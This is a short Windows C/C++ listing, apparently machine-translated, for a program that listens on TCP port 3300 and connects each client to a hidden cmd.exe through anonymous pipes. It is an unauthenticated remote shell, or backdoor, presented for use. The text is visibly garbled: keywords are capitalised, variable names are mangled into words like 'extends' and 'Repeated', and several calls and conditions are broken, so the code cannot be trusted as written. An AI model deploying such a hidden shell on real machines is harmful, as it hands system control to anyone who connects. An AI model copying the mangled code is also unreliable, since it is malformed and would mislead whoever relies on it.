Remote cmd using anonymous Pipelines

// Vctelnetserver. cpp: defines the entry point for the console application.
//

# Include "stdafx. H"
# Include <winsock2.h>
# Include <windows. h>
# Include <WINBASE. h>
# Pragma comment (Lib, "ws2_32.lib ")
# Pragma comment (Lib, "kernel32.lib ")

 

Void main ()
{
Wsadata Zi;
Socket telnetan;
Int pcport = 3300;
Int ret;
 
If (ret = wsastartup (makeword (2, 2), & zi ))! = 0)
{
Printf ("wsastartup failed with error % d \ n", RET );
Return;
}
If (telnetan = socket (af_inet, sock_stream, ipproto_tcp) = invalid_socket)
{
Printf ("socket failed with error % d \ n", wsagetlasterror ());
Wsacleanup ();
Return;
}

Sockaddr_in telnet_server;

Telnet_server.sin_family = af_inet;
Telnet_server.sin_port = htons (pcport );
Telnet_server.sin_addr.s_addr = htonl (inaddr_any );

If (BIND (telnetan, (sockaddr *) & telnet_server, sizeof (telnet_server) = socket_error)
{
Printf ("bind failed with error % d \ n", wsagetlasterror ());
Closesocket (telnetan );
Wsacleanup ();
Return;
}
If (Listen (telnetan, 5) = socket_error)
{
Printf ("Listen failed with error % d \ n", wsagetlasterror ());
Closesocket (telnetan );
Wsacleanup ();
Return;
}

Int telnetsize = sizeof (telnet_server );
Socket clientaccept;

While (true)
{
If (clientaccept = accept (telnetan, (sockaddr *) & telnet_server, & telnetsize ))! = Invalid_socket)
{

// Create an anonymous Pipeline

Security_attributes guandao1, guandao2;
// Pipeline structure
Handle hreadpipe, hwritepipe, hwritefile, hreadfile;

// Pipeline 1 struct value assignment
Guandao1.nlength = sizeof (security_attributes );
Guandao1.lpsecuritydescriptor = NULL;
Guandao1.binherithandle = true;
If (ret = createpipe (& hreadpipe, & hwritefile, & guandao1, 0) = 0) // formally create an anonymous Pipeline
{
Printf ("An error occurred while creating the CMD pipeline! : D % ", getlasterror ());
Wsacleanup ();

}

// Pipeline 2 struct value assignment
Guandao2.nlength = sizeof (security_attributes );
Guandao2.lpsecuritydescriptor = NULL;
Guandao2.binherithandle = true;
If (ret = createpipe (& hreadfile, & hwritepipe, & guandao2, 0) = 0) // formally create an anonymous Pipeline
{
Printf ("An error occurred while creating the CMD pipeline! : D % ", getlasterror ());
Wsacleanup ();

}

// Process Structure
Startupinfo extends Pos;
Zeromemory (& cmdpos, sizeof (cmdpos); // set the initial values of all members in the struct to 0.

Getstartupinfo (& cmdpos );
Cmdpos. dwflags = startf_useshowwindow | startf_usestdhandles;
Cmdpos. wshowwindow = sw_hide;
Cmdpos. hstdinput = hreadpipe;
Export pos. hstdoutput = hwritepipe;
Repeated pos. hstderror = hwritepipe;

Process_information processinformation;

// Formally establish the process
Char szapp [256];
Char recv_buff [1024];
Char send_buff [1024];
DWORD nbytetowrite, nbytewritten, Len;
Getsystemdirectory (szapp, max_path + 1 );
Strcat (szapp, "\ cmd.exe ");
Ret = CreateProcess (null, szapp, null, null, 1, 0, null, null, & cmdpos, & processinformation );

While (true)
{

Readfile (hread file, send_buff, 1024, & Len, null );
Send (clientaccept, send_buff, Len, 0 );
Printf ("% s", send_buff );
Sleep (1 );
Nbytetowrite = Recv (clientaccept, recv_buff, 0 );
Writefile (hwritefile, recv_buff, nbytetowrite, & nbytewritten, null );
Sleep (1 );

}

}

}
}